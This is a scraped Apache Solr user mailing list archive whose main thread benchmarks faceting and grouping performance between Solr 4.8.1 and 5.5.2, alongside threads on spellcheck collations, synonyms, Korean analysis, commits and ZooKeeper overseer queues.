10/3/2016  4.8.1    0             1         N/A               83           52
10/3/2016  4.8.1    0             1         N/A               85           51

On Wed, Sep 28, 2016 at 4:44 PM, Solr User <solr...@gmail.com> wrote: > I plan to re-test this in a separate environment that I have more control > over and will share the results when I can. 
> > On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote: > >> Certainly. And I would of course welcome anyone else to test this for >> themselves especially with facet.method=uif to see if that has indeed >> bridged the gap between Solr 4 and Solr 5. I would be very happy if my >> testing is invalid due to variance, problem in process, etc. One thing I >> was pondering is if I should force merge the index to a certain amount of >> segments because indexing yields a random number of segments and >> deletions. The only thing stopping me short of doing that were >> observations of longer Solr 4 times even with more deletions and similar >> number of segments. >> >> We use Soasta as our testing tool. Before testing, load is sent for >> 10-15 minutes to make sure any Solr caches have stabilized. Then the test >> is run for 30 minutes of steady volume with Scenario #1 tested at 15 >> req/sec and Scenario #2 tested at 100 req/sec. Each request is different >> with input being pulled from data files. The requests are repeatable test >> to test. >> >> The numbers posted above are average response times as reported by >> Soasta. However, respective time differences are supported by Splunk which >> indexes the Solr logs and Dynatrace which is instrumented on one of the >> JVM's. >> >> The versions are deployed to the same machines thereby overlaying the >> previous installation. Going Solr 4 to Solr 5, full indexing is run with >> the same input data. Being in SolrCloud mode, the full indexing comprises >> of indexing all documents and then deleting any that were not touched. >> Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not >> load with a Solr 5 index. Testing Solr 4 after reverting yields the same >> results as the previous Solr 4 test. 
>> >> >> On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> >> wrote: >> >>> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote: >>> > Further testing indicates that any performance difference is not due >>> > to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing >>> > deletes. >>> >>> Sanity check: Could you describe how you test? >>> >>> * How many queries do you issue for each test? >>> * Are each query a new one or do you re-use the same query? >>> * Do you discard the first X calls? >>> * Are the numbers averages, medians or something third? >>> * What do you do about disk cache? >>> * Are both Solr's on the same machine? >>> * Do they use the same index? >>> * Do you alternate between testing 4.8.1 and 5.5.2 first? >>> >>> - Toke Eskildsen, State and University Library, Denmark >>> >> >> >
Re: Faceting and Grouping Performance Degradation in Solr 5
I plan to re-test this in a separate environment that I have more control over and will share the results when I can. On Wed, Sep 28, 2016 at 3:37 PM, Solr User <solr...@gmail.com> wrote: > Certainly. And I would of course welcome anyone else to test this for > themselves especially with facet.method=uif to see if that has indeed > bridged the gap between Solr 4 and Solr 5. I would be very happy if my > testing is invalid due to variance, problem in process, etc. One thing I > was pondering is if I should force merge the index to a certain amount of > segments because indexing yields a random number of segments and > deletions. The only thing stopping me short of doing that were > observations of longer Solr 4 times even with more deletions and similar > number of segments. > > We use Soasta as our testing tool. Before testing, load is sent for 10-15 > minutes to make sure any Solr caches have stabilized. Then the test is run > for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and > Scenario #2 tested at 100 req/sec. Each request is different with input > being pulled from data files. The requests are repeatable test to test. > > The numbers posted above are average response times as reported by > Soasta. However, respective time differences are supported by Splunk which > indexes the Solr logs and Dynatrace which is instrumented on one of the > JVM's. > > The versions are deployed to the same machines thereby overlaying the > previous installation. Going Solr 4 to Solr 5, full indexing is run with > the same input data. Being in SolrCloud mode, the full indexing comprises > of indexing all documents and then deleting any that were not touched. > Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not > load with a Solr 5 index. Testing Solr 4 after reverting yields the same > results as the previous Solr 4 test. 
> > > On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> > wrote: > >> On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote: >> > Further testing indicates that any performance difference is not due >> > to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing >> > deletes. >> >> Sanity check: Could you describe how you test? >> >> * How many queries do you issue for each test? >> * Are each query a new one or do you re-use the same query? >> * Do you discard the first X calls? >> * Are the numbers averages, medians or something third? >> * What do you do about disk cache? >> * Are both Solr's on the same machine? >> * Do they use the same index? >> * Do you alternate between testing 4.8.1 and 5.5.2 first? >> >> - Toke Eskildsen, State and University Library, Denmark >> > >
Re: Faceting and Grouping Performance Degradation in Solr 5
Certainly. And I would of course welcome anyone else to test this for themselves especially with facet.method=uif to see if that has indeed bridged the gap between Solr 4 and Solr 5. I would be very happy if my testing is invalid due to variance, problem in process, etc. One thing I was pondering is if I should force merge the index to a certain amount of segments because indexing yields a random number of segments and deletions. The only thing stopping me short of doing that were observations of longer Solr 4 times even with more deletions and similar number of segments. We use Soasta as our testing tool. Before testing, load is sent for 10-15 minutes to make sure any Solr caches have stabilized. Then the test is run for 30 minutes of steady volume with Scenario #1 tested at 15 req/sec and Scenario #2 tested at 100 req/sec. Each request is different with input being pulled from data files. The requests are repeatable from test to test. The numbers posted above are average response times as reported by Soasta. However, respective time differences are supported by Splunk which indexes the Solr logs and Dynatrace which is instrumented on one of the JVM's. The versions are deployed to the same machines thereby overlaying the previous installation. Going Solr 4 to Solr 5, full indexing is run with the same input data. Being in SolrCloud mode, the full indexing comprises indexing all documents and then deleting any that were not touched. Going Solr 5 back to Solr 4, the snapshot is restored since Solr 4 will not load with a Solr 5 index. Testing Solr 4 after reverting yields the same results as the previous Solr 4 test. On Wed, Sep 28, 2016 at 4:02 AM, Toke Eskildsen <t...@statsbiblioteket.dk> wrote: > On Tue, 2016-09-27 at 15:08 -0500, Solr User wrote: > > Further testing indicates that any performance difference is not due > > to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing > > deletes. > > Sanity check: Could you describe how you test? 
> > * How many queries do you issue for each test? > * Are each query a new one or do you re-use the same query? > * Do you discard the first X calls? > * Are the numbers averages, medians or something third? > * What do you do about disk cache? > * Are both Solr's on the same machine? > * Do they use the same index? > * Do you alternate between testing 4.8.1 and 5.5.2 first? > > - Toke Eskildsen, State and University Library, Denmark >
Re: Faceting and Grouping Performance Degradation in Solr 5
Further testing indicates that any performance difference is not due to deletes. Both Solr 4.8.1 and Solr 5.5.2 benefited from removing deletes. The times appear to converge on an optimized index. Below are the details. Not sure what else to make of this at this point other than moving forward with an upgrade with an optimized index wherever possible. Scenario #1: Using facet.method=uif with faceting on several multi-valued fields. 4.8.1 (with deletes): 115 ms 5.5.2 (with deletes): 155 ms 4.8.1 (without deletes): 104 ms 5.5.2 (without deletes): 125 ms 4.8.1 (1 segment without deletes): 55 ms 5.5.2 (1 segment without deletes): 44 ms Scenario #2: Using facet.method=enum with faceting on several multi-valued fields. These fields are different than Scenario #1 and perform much better with enum hence that method is used instead. 4.8.1 (with deletes): 38 ms 5.5.2 (with deletes): 49 ms 4.8.1 (without deletes): 35 ms 5.5.2 (without deletes): 42 ms 4.8.1 (1 segment without deletes): 28 ms 5.5.2 (1 segment without deletes): 34 ms On Tue, Sep 27, 2016 at 3:45 AM, Alessandro Benedetti <abenede...@apache.org > wrote: > Hi ! > At the time we didn't investigate the deletion implication at all. > This can be interesting. > if you proceed with your investigations and discover what changed in the > deletion approach, I would be more than happy to help! > > Cheers > > On Mon, Sep 26, 2016 at 10:59 PM, Solr User <solr...@gmail.com> wrote: > > > Thanks again for your work on honoring the facet.method. I have an > > observation that I would like to share and get your feedback on if > > possible. > > > > I performance tested Solr 5.5.2 with various facet queries and the only > way > > I get comparable results to Solr 4.8.1 is when I expungeDeletes. Is it > > possible that Solr 5 is not as efficiently ignoring deletes as Solr 4? > > Here are the details. > > > > Scenario #1: Using facet.method=uif with faceting on several > multi-valued > > fields. 
> > 4.8.1 (with deletes): 115 ms > > 5.5.2 (with deletes): 155 ms > > 5.5.2 (without deletes): 125 ms > > 5.5.2 (1 segment without deletes): 44 ms > > > > Scenario #2: Using facet.method=enum with faceting on several > multi-valued > > fields. These fields are different than Scenario #1 and perform much > > better with enum hence that method is used instead. > > 4.8.1 (with deletes): 38 ms > > 5.5.2 (with deletes): 49 ms > > 5.5.2 (without deletes): 42 ms > > 5.5.2 (1 segment without deletes): 34 ms > > > > > > > > On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti < > > abenede...@apache.org> wrote: > > > > > Interesting developments : > > > > > > https://issues.apache.org/jira/browse/SOLR-9176 > > > > > > I think we found why term Enum seems slower in recent Solr ! > > > In our case it is likely to be related to the commit I mention in the > > Jira. > > > Have a check Joel ! > > > > > > On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti < > > > abenede...@apache.org> wrote: > > > > > > > I am investigating this scenario right now. > > > > I can confirm that the enum slowness is in Solr 6.0 as well. > > > > And I agree with Joel, it seems to be un-related with the famous > > faceting > > > > regression :( > > > > > > > > Furthermore with the legacy facet approach, if you set docValues for > > the > > > > field you are not going to be able to try the enum approach anymore. > > > > > > > > org/apache/solr/request/SimpleFacets.java:448 > > > > > > > > if (method == FacetMethod.ENUM && sf.hasDocValues()) { > > > > // only fc can handle docvalues types > > > > method = FacetMethod.FC; > > > > } > > > > > > > > > > > > I got really horrible regressions simply using term enum in both > Solr 4 > > > > and Solr 6. > > > > > > > > And even the most optimized fcs approach with docValues and > > > > facet.threads=nCore does not perform as the simple enum in Solr 4 . > > > > > > > > i.e. > > > > > > > > For some sample queries I have 40 ms vs 160 ms and similar... 
> > > > I think we should open an issue if we can confirm it is not related > > with > > > > the other. > > > > A lot of people will continue using the legacy approach for a > while... > > > > > > > > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com > > &g
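For anyone reproducing the "without deletes" runs above: deleted documents can be purged without a full optimize by sending an explicit commit with expungeDeletes to the update handler. A sketch (the merge cost of expunging still applies):

```xml
<!-- POST as the request body to /solr/<collection>/update -->
<commit expungeDeletes="true"/>
```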
Re: Faceting and Grouping Performance Degradation in Solr 5
Thanks again for your work on honoring the facet.method. I have an observation that I would like to share and get your feedback on if possible. I performance tested Solr 5.5.2 with various facet queries and the only way I get comparable results to Solr 4.8.1 is when I expungeDeletes. Is it possible that Solr 5 is not as efficiently ignoring deletes as Solr 4? Here are the details. Scenario #1: Using facet.method=uif with faceting on several multi-valued fields. 4.8.1 (with deletes): 115 ms 5.5.2 (with deletes): 155 ms 5.5.2 (without deletes): 125 ms 5.5.2 (1 segment without deletes): 44 ms Scenario #2: Using facet.method=enum with faceting on several multi-valued fields. These fields are different than Scenario #1 and perform much better with enum hence that method is used instead. 4.8.1 (with deletes): 38 ms 5.5.2 (with deletes): 49 ms 5.5.2 (without deletes): 42 ms 5.5.2 (1 segment without deletes): 34 ms On Tue, May 31, 2016 at 11:57 AM, Alessandro Benedetti < abenede...@apache.org> wrote: > Interesting developments : > > https://issues.apache.org/jira/browse/SOLR-9176 > > I think we found why term Enum seems slower in recent Solr ! > In our case it is likely to be related to the commit I mention in the Jira. > Have a check Joel ! > > On Wed, May 25, 2016 at 12:30 PM, Alessandro Benedetti < > abenede...@apache.org> wrote: > > > I am investigating this scenario right now. > > I can confirm that the enum slowness is in Solr 6.0 as well. > > And I agree with Joel, it seems to be un-related with the famous faceting > > regression :( > > > > Furthermore with the legacy facet approach, if you set docValues for the > > field you are not going to be able to try the enum approach anymore. 
> > > > org/apache/solr/request/SimpleFacets.java:448 > > > > if (method == FacetMethod.ENUM && sf.hasDocValues()) { > > // only fc can handle docvalues types > > method = FacetMethod.FC; > > } > > > > > > I got really horrible regressions simply using term enum in both Solr 4 > > and Solr 6. > > > > And even the most optimized fcs approach with docValues and > > facet.threads=nCore does not perform as the simple enum in Solr 4 . > > > > i.e. > > > > For some sample queries I have 40 ms vs 160 ms and similar... > > I think we should open an issue if we can confirm it is not related with > > the other. > > A lot of people will continue using the legacy approach for a while... > > > > On Wed, May 18, 2016 at 10:42 PM, Joel Bernstein <joels...@gmail.com> > > wrote: > > > >> The enum slowness is interesting. It would appear on the surface to not > be > >> related to the FieldCache issue. I don't think the main emphasis of the > >> JSON facet API has been the enum approach. You may find using the JSON > >> facet API and eliminating the use of enum meets your performance needs. > >> > >> With the CollapsingQParserPlugin top_fc is definitely faster during > >> queries. The tradeoff is slower warming times and increased memory usage > >> if > >> the collapse fields are used in faceting, as faceting will load the > field > >> into a different cache. > >> > >> Joel Bernstein > >> http://joelsolr.blogspot.com/ > >> > >> On Wed, May 18, 2016 at 5:28 PM, Solr User <solr...@gmail.com> wrote: > >> > >> > Joel, > >> > > >> > Thank you for taking the time to respond to my question. I tried the > >> JSON > >> > Facet API for one query that uses facet.method=enum (since this one > has > >> a > >> > ton of unique values and performed better with enum) but this was way > >> > slower than even the slower Solr 5 times. I did not try the new API > >> with > >> > the non-enum queries though so I will give that a go. 
It looks like > >> Solr > >> > 5.5.1 also has a facet.method=uif which will be interesting to try. > >> > > >> > If these do not prove helpful, it looks like I will need to wait for > >> > SOLR-8096 to be resolved before upgrading. > >> > > >> > Thanks also for your comment on top_fc for the CollapsingQParser. I > use > >> > collapse/expand for some queries but traditional grouping for others > >> due to > >> > performance. It will be interesting to see if those grouping queries > >> > perform better now using CollapsingQParser with top_fc. > >> > > >> > On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com> > >> > wrot
Re: Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE
Hi all - please help me here On Thursday, July 21, 2016, SRINI SOLR <srini.s...@gmail.com> wrote: > Hi All - > Could you please help me on spell check on multi-word phrase as a whole... > Scenario - > I have a problem with solr spellcheck suggestions for multi word phrases. With the query for 'red chillies' > > q=red+chillies=xml=true=true=true=true > > I get > > > > 2 > 4 > 12 > 0 > > chiller4 > challis2 > > > false > red chiller > > > The problem is, even though 'chiller' has 4 results in index, 'red chiller' has none. So we end up suggesting a phrase with 0 result. > > What can I do to make spellcheck work on the whole phrase only? > > Please help me here ...
Solr 4.3.1 - Spell-Checker with MULTI-WORD PHRASE
Hi All - Could you please help me on spell check on multi-word phrase as a whole... Scenario - I have a problem with solr spellcheck suggestions for multi word phrases. With the query for 'red chillies' q=red+chillies=xml=true=true=true=true I get 2 4 12 0 chiller4 challis2 false red chiller The problem is, even though 'chiller' has 4 results in index, 'red chiller' has none. So we end up suggesting a phrase with 0 result. What can I do to make spellcheck work on the whole phrase only? Please help me here ...
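A common remedy for zero-hit collations (a general sketch, not the poster's configuration): with spellcheck.maxCollationTries greater than zero, the spellchecker runs each candidate collation as a real query and only returns collations that actually produce hits. As handler defaults:

```xml
<requestHandler name="/select" class="solr.SearchHandler">
  <lst name="defaults">
    <str name="spellcheck">true</str>
    <str name="spellcheck.collate">true</str>
    <!-- try up to 5 candidate collations against the index and
         return only those that yield results -->
    <str name="spellcheck.maxCollationTries">5</str>
    <str name="spellcheck.collateExtendedResults">true</str>
  </lst>
  <arr name="last-components">
    <str>spellcheck</str>
  </arr>
</requestHandler>
```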
Recommendations for analyzing Korean?
Hi - What's the current recommendation for searching/analyzing Korean? The reference guide only lists CJK: https://cwiki.apache.org/confluence/display/solr/Language+Analysis I see a bunch of work was done on https://issues.apache.org/jira/browse/LUCENE-4956, but it doesn't look like that was ever committed - and the last comment was years ago. There seem to be a few versions of this in the wild, a more recent one: https://github.com/juncon/arirang.lucene-analyzer-5.0.0, and the original: https://sourceforge.net/projects/lucenekorean/ but I'm not sure what's the canonical source at this point. I also see this: https://bitbucket.org/eunjeon/mecab-ko-lucene-analyzer Suggestions? Thanks, Tom
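For reference, the bigram-based CJK analysis the reference guide points to looks roughly like this (a generic sketch of the stock approach, not a Korean-specific morphological analyzer):

```xml
<fieldType name="text_cjk" class="solr.TextField" positionIncrementGap="100">
  <analyzer>
    <tokenizer class="solr.StandardTokenizerFactory"/>
    <!-- normalize halfwidth/fullwidth forms -->
    <filter class="solr.CJKWidthFilterFactory"/>
    <filter class="solr.LowerCaseFilterFactory"/>
    <!-- index runs of CJK characters as overlapping bigrams -->
    <filter class="solr.CJKBigramFilterFactory"/>
  </analyzer>
</fieldType>
```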
Re: Solr 4.3.1 - Does not load the new data using the Java application
Hi Upayavira / Team - Can you please explain in-detail - how to do the commit...? if we do the commit - Will the new data will be available to Java Application with-out calling *embeddedSolrServer.* *getCoreContainer().load()*. again. ...? Please help me here ... Thanks in Advance. On Thu, Jun 9, 2016 at 4:08 PM, Upayavira <u...@odoko.co.uk> wrote: > Are you executing a commit? > > You must commit before your content becomes visible. > > Upayavira > > On Thu, 9 Jun 2016, at 11:13 AM, SRINI SOLR wrote: > > Hi Team - > > Can you please help me out on the below issue ... > > > > We are using the Solr 4.3.1 version. > > > > Integrated Solr 4.3.1 with Java application using EmbeddedSolrServer. > > > > Using this EmbeddedSolrServer in java - loading the core container as > > below ... > > *embeddedSolrServer.getCoreContainer().load();* > > > > We are loading the container at the time of initiating the > > ApplicationContext. And now Java application is able to access the > > indexed > > data. > > > > *Now the issue is - * > > *If I index the new data in Solr - the same data is not getting loaded > > through Java application until and un-less if I again load the Core > > Container using **embeddedSolrServer.getCoreContainer().load().* > > > > Can you please help me out to on how to access the new data (which is > > indexed on Solr) using java application with out calling every-time > > *embeddedSolrServer.getCoreContainer().load().* > > > > *??? * > > > > *Please help me out ... I am stuck and not able to proceed further ... It > > is leading to critical issue ...* > > > > *Thanks In Advance.* >
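To expand on the commit question: besides calling commit from the client after indexing, commits can be automated in solrconfig.xml. With openSearcher set to true, each commit opens a new searcher, so freshly indexed documents become visible without reloading the core container. A sketch; the interval here is arbitrary:

```xml
<updateHandler class="solr.DirectUpdateHandler2">
  <autoCommit>
    <!-- commit at most 60s after the first uncommitted document -->
    <maxTime>60000</maxTime>
    <!-- open a new searcher so committed documents are searchable -->
    <openSearcher>true</openSearcher>
  </autoCommit>
</updateHandler>
```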
Solr 4.3.1 - Does not load the new data using the Java application
Hi Team - Can you please help me out on the below issue ... We are using the Solr 4.3.1 version. Integrated Solr 4.3.1 with a Java application using EmbeddedSolrServer. Using this EmbeddedSolrServer in Java - loading the core container as below ... *embeddedSolrServer.getCoreContainer().load();* We are loading the container at the time of initiating the ApplicationContext. And now the Java application is able to access the indexed data. *Now the issue is - * *If I index new data in Solr - the same data is not getting loaded through the Java application unless I again load the Core Container using **embeddedSolrServer.getCoreContainer().load().* Can you please help me out on how to access the new data (which is indexed in Solr) from the Java application without calling *embeddedSolrServer.getCoreContainer().load()* every time. *??? * *Please help me out ... I am stuck and not able to proceed further ... It is leading to a critical issue ...* *Thanks In Advance.*
Re: Indexing a (File attached to a document)
Hi I am using the MapReduceIndexerTool to index data from HDFS, using morphlines as the ETL tool. The data paths are specified as XPath expressions in the morphline file. Sorry for the delay -- View this message in context: http://lucene.472066.n3.nabble.com/Indexing-a-File-attached-to-a-document-tp4276334p4278730.html Sent from the Solr - User mailing list archive at Nabble.com.
Re: Faceting and Grouping Performance Degradation in Solr 5
Joel, Thank you for taking the time to respond to my question. I tried the JSON Facet API for one query that uses facet.method=enum (since this one has a ton of unique values and performed better with enum) but this was way slower than even the slower Solr 5 times. I did not try the new API with the non-enum queries though so I will give that a go. It looks like Solr 5.5.1 also has a facet.method=uif which will be interesting to try. If these do not prove helpful, it looks like I will need to wait for SOLR-8096 to be resolved before upgrading. Thanks also for your comment on top_fc for the CollapsingQParser. I use collapse/expand for some queries but traditional grouping for others due to performance. It will be interesting to see if those grouping queries perform better now using CollapsingQParser with top_fc. On Wed, May 18, 2016 at 11:39 AM, Joel Bernstein <joels...@gmail.com> wrote: > Yes, SOLR-8096 is the issue here. > > I don't believe indexing with docValues is going to help too much with > this. The enum slowness may not be related, but I'm not positive about > that. > > The major slowdowns are likely due to the removal of the top level > FieldCache from general use and the removal of the FieldValuesCache which > was used for multi-value field faceting. > > The JSON facet API covers all the functionality in the traditional > faceting, and it has been developed to be very performant. > > You may also want to see if Collapse/Expand can meet your applications > needs rather Grouping. It allows you to specify using a top level > FieldCache if performance is a blocker without it. > > > > > Joel Bernstein > http://joelsolr.blogspot.com/ > > On Wed, May 18, 2016 at 10:42 AM, Solr User <solr...@gmail.com> wrote: > > > Does anyone know the answer to this? 
> > > > On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote: > > > > > I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but > > had > > > to abort due to average response times degraded from a baseline volume > > > performance test. The affected queries involved faceting (both enum > > method > > > and default) and grouping. There is a critical bug > > > https://issues.apache.org/jira/browse/SOLR-8096 currently open which I > > > gather is the cause of the slower response times. One concern I have > is > > > that discussions around the issue offer the suggestion of indexing with > > > docValues which alleviated the problem in at least that one reported > > case. > > > However, indexing with docValues did not improve the performance in my > > case. > > > > > > Can someone please confirm or correct my understanding that this issue > > has > > > no path forward at this time and specifically that it is already known > > that > > > docValues does not necessarily solve this? > > > > > > Thanks in advance! > > > > > > > > > > > >
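As a concrete reference for the JSON Facet API discussed above, a terms facet over a multi-valued field is passed as the json.facet parameter on a /select request. A sketch; the field name is hypothetical:

```json
{
  "categories": {
    "type": "terms",
    "field": "category",
    "limit": 10
  }
}
```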
Re: Faceting and Grouping Performance Degradation in Solr 5
Does anyone know the answer to this? On Wed, May 4, 2016 at 2:19 PM, Solr User <solr...@gmail.com> wrote: > I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had > to abort due to average response times degraded from a baseline volume > performance test. The affected queries involved faceting (both enum method > and default) and grouping. There is a critical bug > https://issues.apache.org/jira/browse/SOLR-8096 currently open which I > gather is the cause of the slower response times. One concern I have is > that discussions around the issue offer the suggestion of indexing with > docValues which alleviated the problem in at least that one reported case. > However, indexing with docValues did not improve the performance in my case. > > Can someone please confirm or correct my understanding that this issue has > no path forward at this time and specifically that it is already known that > docValues does not necessarily solve this? > > Thanks in advance! > > >
Re: Filter query (fq) on comma-separated value does not work
Hi Ahmet / Team - Thanks for your quick response... Can you please help me out on this PatternTokenizer configuration... Here we are using configuration as below ... And also - I have made changes to the field value so that it is separated by space instead of commas and indexed the data as such... And now I was able to retrieve the expected results. But still, can you help me out in achieving the results using the comma as you suggested. Thanks & Regards On Mon, May 16, 2016 at 5:50 PM, Ahmet Arslan <iori...@yahoo.com.invalid> wrote: > Hi, > > It's all about how you tokenize the category field. > It looks like you are using a string type, which does not tokenize at all > (e.g. verbatim) > Please use a PatternTokenizer and configure it so that it splits on comma. > > Ahmet > > > > On Monday, May 16, 2016 2:11 PM, SRINI SOLR <srini.s...@gmail.com> wrote: > Hi Team - > Can you please help me out on the following ... > > I have a following field in the solr document which has the comma separated > values like below .. > > 1,456,768,345 doc1 > 456 doc2 > 1,456 doc3 > > So - Here I need to filter the search docs which contains category is > 456... > when i do like following ... > > fq=category:456 > > it is returning only one document doc2 which has only category is 456. > 456 > > But I need other two also which as this category 456 > > Can you please help me out to achieve this ... > > > Thanks & Regards >
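For the archives, a field type along the lines Ahmet describes might look like this (a sketch, not the poster's actual configuration; the data must be reindexed after the change):

```xml
<fieldType name="commaDelimited" class="solr.TextField">
  <analyzer>
    <!-- emit one token per comma-separated value, trimming whitespace -->
    <tokenizer class="solr.PatternTokenizerFactory" pattern="\s*,\s*"/>
  </analyzer>
</fieldType>

<field name="category" type="commaDelimited" indexed="true" stored="true"/>
```

With this in place, fq=category:456 matches every document whose comma-separated list contains 456, not only documents whose whole value is 456.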
Filter query (fq) on comma-separated value does not work
Hi Team - Can you please help me out on the following ... I have a field in the Solr document which has comma-separated values like below .. 1,456,768,345 doc1 456 doc2 1,456 doc3 So - here I need to filter the search docs whose category contains 456... When I do the following ... fq=category:456 it returns only one document, doc2, whose category is exactly 456. But I need the other two documents as well, which also have category 456. Can you please help me out to achieve this ... Thanks & Regards
Indexing a (File attached to a document)
Hi If I index a document with a file attachment in Solr, can I also see the data of that attached file while querying that particular document? Please help me on this Thanks & Regards Vidya Nadella -- View this message in context: http://lucene.472066.n3.nabble.com/Indexing-a-File-attached-to-a-document-tp4276334.html Sent from the Solr - User mailing list archive at Nabble.com.
Multi-word Synonyms Solr 4.3.1 does not work
Hi All - Can you please help me out with multi-word synonyms in Solr 4.3.1. I am using synonyms like below test1,test2 => movie1 cinema,movie2 cinema,movie3 cinema I am able to succeed with the above syntax: if I search for words like test1 or test2 then the right-hand side multi-word values are matched. But I also have synonyms like below - multi-word on both sides, left-hand and right-hand... test1 test, test2 test, test3 test => movie1 cinema,movie2 cinema,movie3 cinema With the above left-hand multi-word format, matching is not working as expected. Here below is the configuration I am using on the query analyzer ... Please help me
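Some background, not from the thread: in Solr 4.x, multi-word synonyms on the left-hand side generally cannot match at query time, because the query parser splits the query on whitespace before the analyzer runs, so the synonym filter never sees "test1 test" as a single unit. The usual workaround is to apply the expansion at index time instead. A sketch:

```xml
<analyzer type="index">
  <tokenizer class="solr.StandardTokenizerFactory"/>
  <!-- expand multi-word synonyms at index time, where the filter
       sees the full token stream rather than whitespace-split
       query fragments -->
  <filter class="solr.SynonymFilterFactory" synonyms="synonyms.txt"
          ignoreCase="true" expand="true"/>
  <filter class="solr.LowerCaseFilterFactory"/>
</analyzer>
```

The trade-off is that changing synonyms.txt then requires a reindex.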
Faceting and Grouping Performance Degradation in Solr 5
I recently was attempting to upgrade from Solr 4.8.1 to Solr 5.4.1 but had to abort due to average response times degraded from a baseline volume performance test. The affected queries involved faceting (both enum method and default) and grouping. There is a critical bug https://issues.apache.org/jira/browse/SOLR-8096 currently open which I gather is the cause of the slower response times. One concern I have is that discussions around the issue offer the suggestion of indexing with docValues which alleviated the problem in at least that one reported case. However, indexing with docValues did not improve the performance in my case. Can someone please confirm or correct my understanding that this issue has no path forward at this time and specifically that it is already known that docValues does not necessarily solve this? Thanks in advance!
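For readers trying the docValues suggestion from the issue discussion: it is a per-field schema change and only takes effect after a full reindex. A sketch; the field name is hypothetical:

```xml
<field name="category" type="string" indexed="true" stored="true"
       multiValued="true" docValues="true"/>
```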
EmbeddedSolrServer Loading Core Containers Solr 4.3.1
Hi Team - I am using Solr 4.3.1. We are using EmbeddedSolrServer to load core containers in one of our Java applications. This is set up as a cron job every hour to load the new data into the containers; otherwise, the new data is not visible from the Java application even after re-indexing. Please help here to resolve the issue ...?
want to subscribe
Re: Solr 4.7.2 Vs 5.3.0 Docs different for same query
Mr. Uchida, Thank you for responding. It was my fault: I had an update processor which takes specific text and string fields and concatenates them into a single field, and I search on that single field. Recently I used an atomic update to fix a specific field's value and forgot to disable the UpdateProcessor chain... Since I was only updating one field, the aggregate field got messed up with just that field value and hence I had issues searching. I reindexed the data again last night and now it is all good. I do have a small question: when we update the zookeeper ensemble with new configs via the 'upconfig' and 'linkconfig' commands, do we have to "reload" the collections on all the nodes to see the updated config? Is there a single call which can update all nodes connected to the ensemble? I just went to the admin UI and hit the "Reload" button manually on each of the nodes... Is that the correct way to do it? Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 12:04 AM, Tomoko Uchida <tomoko.uchida.1...@gmail.com > wrote: > Are you sure that you've indexed same data to Solr 4.7.2 and 5.3.0 ? > If so, I suspect that you have multiple shards and request to one shard. > (In that case, you might get partial results) > > Can you share HTTP request url and the schema and default search field ? > > > 2015-10-02 6:09 GMT+09:00 Ravi Solr <ravis...@gmail.com>: > > > I we migrated from 4.7.2 to 5.3.0. I sourced the docs from 4.7.2 core and > > indexed into 5.3.0 collection (data directories are different) via > > SolrEntityProcessor. Currently my production is all whack because of this > > issue. Do I have to go back and reindex all again ?? Is there a quick fix > > for this ? > > > > Here are the results for the query 'obama'...please note the numfound. > > 4.7.2 has almost 148519 docs while 5.3.0 says it only has 5.3.0 docs. Any > > pointers on how to correct this ? 
> > [quoted response XML stripped by the archive: for q=obama, both the Solr 4.7.2 and the SolrCloud 5.3.0 responses show status=0 and QTime=2; the numFound values did not survive] > > > > Thanks > > > > Ravi Kiran Bhaskar > > >
Re: Zk and Solr Cloud
Awesome nugget Shawn, I also faced a similar issue a while ago while I was doing a full re-index. It would be great if such tips were added to FAQ-type documentation on cwiki. I love the SOLR forum - every day I learn something new :-) Thanks Ravi Kiran Bhaskar On Fri, Oct 2, 2015 at 1:58 AM, Shawn Heisey <apa...@elyograg.org> wrote: > On 10/1/2015 1:26 PM, Rallavagu wrote: > > Solr 4.6.1 single shard with 4 nodes. Zookeeper 3.4.5 ensemble of 3. > > > > See following errors in ZK and Solr and they are connected. > > > > When I see the following error in Zookeeper, > > > > unexpected error, closing socket connection and attempting reconnect > > java.io.IOException: Packet len11823809 is out of range! > > This is usually caused by the overseer queue (stored in zookeeper) > becoming extraordinarily huge, because it's being flooded with work > entries far faster than the overseer can process them. This causes the > znode where the queue is stored to become larger than the maximum size > for a znode, which defaults to about 1MB. In this case (reading your > log message that says len11823809), something in zookeeper has gotten to > be 11MB in size, so the zookeeper client cannot read it. > > I think the zookeeper server code must be handling the addition of > children to the queue znode through a code path that doesn't pay > attention to the maximum buffer size, just goes ahead and adds it, > probably by simply appending data. I'm unfamiliar with how the ZK > database works, so I'm guessing here. > > If I'm right about where the problem is, there are two workarounds to > your immediate issue. > > 1) Delete all the entries in your overseer queue using a zookeeper > client that lets you edit the DB directly. If you haven't changed the > cloud structure and all your servers are working, this should be safe. 
